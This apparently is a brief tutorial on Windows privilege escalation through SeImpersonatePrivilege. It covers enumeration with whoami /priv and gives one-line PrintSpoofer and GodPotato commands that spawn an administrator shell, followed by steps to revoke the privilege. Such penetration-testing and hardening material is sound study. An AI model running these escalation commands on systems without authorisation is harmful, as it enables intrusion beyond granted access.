Attacks - Windows Privilege Escalation

Abuse Privileges - SeImpersonatePrivilege

SeImpersonatePrivilege is a Windows setting that lets a user or program act as someone else on the system. This means they can do things and access files or resources as if they were another user.

While this can be useful for certain tasks, it can also be dangerous if itโ€™s not managed carefully. If the wrong person or program gets this privilege, they could use it to hack into the system and gain access theyโ€™re not supposed to have.

Enumeration

whoami /priv

Exploitation

Actually itโ€™s soo easy that it just one command to get an Administrator Privilege ๐Ÿ™‚.

We will use PrintSpoofer

PrintSpoofer64.exe -i -c cmd

or with GodPotato

GodPotato-NET4.exe -cmd "cmd /c whoami"

Thatโ€™s it. ๐ŸŽ‰

Mitigation

Follow the steps below to remove the SeImpersonatePrivilege from a user:

  1. Press Win + R to open the Run dialog, type secpol.msc, and hit Enter. This will open the Local Security Policy editor.

  2. In the Local Security Policy editor, navigate to Local Policies > User Rights Assignment.

  3. Look for the Impersonate a client after authentication policy (which corresponds to SeImpersonatePrivilege).

  4. Double-click the policy, and a properties window will appear.

  5. In the properties window, you can remove the user or group from the list to revoke the privilege. Click Apply and then OK to save the changes.